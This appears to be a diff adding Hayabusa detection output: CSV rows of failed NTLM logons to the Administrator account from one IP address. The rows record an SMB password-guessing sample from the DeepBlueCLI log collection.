+2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ns12T94itDDRxYxC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8jplFaHgwrWpFY8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ9L626fGZQkNC25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HfplQ16d7lsObzki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c30ILHx5sYZCMflg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GMsJKiYmbgbr9wF0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2hpQI6z68MVBzoW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDgzJjXBnWDSVjdg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0XU5HdsnM0Lvpvq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjmtkv6JDb4s2WnR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6mBM2WMWlKkQHZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3jo7coI8uS8JCorc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ao6QcPI3nzpNnHi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WkP8vstCEOH9wnUW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzrhcYEue85zhZ8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ivpdjGaxoZOCTxbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIsZXHE4Swkbytiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bdT2bVjtEd6KhQWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RT9Tqp0lf0dd6h9C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xwhlrl2ck1o2qTDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxX2762Fa804981t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O55rRqTo9vgwnYoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zo7BzxXZDdykOXoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6YGEMcvYtwNJys39 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0xq8et2LwWSgVgk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43EK0cGlZBhWRd5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UBoGMdTjWVVVvifn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcCrPXp3VLObGU6v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zhZguuPimqAruiTu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o6amdSWFFbueCyp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0wRaNXdhMlIY1HX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J8jqrrwWeKZGypW0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LIavw2zakOP4DqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qz7gr4vA633waQ01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2TmHz5POLSNJHm2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DcpOxhy2nnLIEGHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gJxfDgfujy5Um2wa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 217VTq8EbYIDeSXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPfE1m0tsJAJnRt9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OQCfGhvBMSq3PIoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XBl6JIRetWEnjaVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXJMNnj4LeBIYARt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3sdn9f4xtvcsaHp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DWT0NepMYD29cOwh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DDb7wV6uzj1tat2d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RBcmANUL4a6DFobS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL2swHF9MtnCfnp3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0ZkcAD0IakqSUph | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5HgksdIGukmliZeE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYoLckmmOWCSf4Q2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PTxr8Zkz2y2XwBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3caypkIM2XqoSSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yuQOUzJ6sU5AhARR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SyM3OrjUHub9k23k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vY7SRoWumGQOrljW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iFrO2nUMlfeDLGyc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9B8Gq7d30U8DqdN0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxSPuxpCHgSo1d1a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9elGZ4POExblUCAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XHY9Ig3sqQKNXYqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: voMDzTqYqKpfudKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8m9SJ1aFpvFqClU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dM84lQYVfHhZmgpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O5FrdBbYXWaqFkeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxiNMjsd3YfoCNa2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v1u5uD9SiDFq9VOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pZv9l3b7U8tIVmw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EfPqiBhm6hRX700 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uvqgri2KGIDAlg1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLXZMXKsjOaurgZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXtiRWHDJqpq69Ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeC1T9YkT1hXMcGG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPf6nlwAeuu7cf00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fvVUozD2RuIchN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
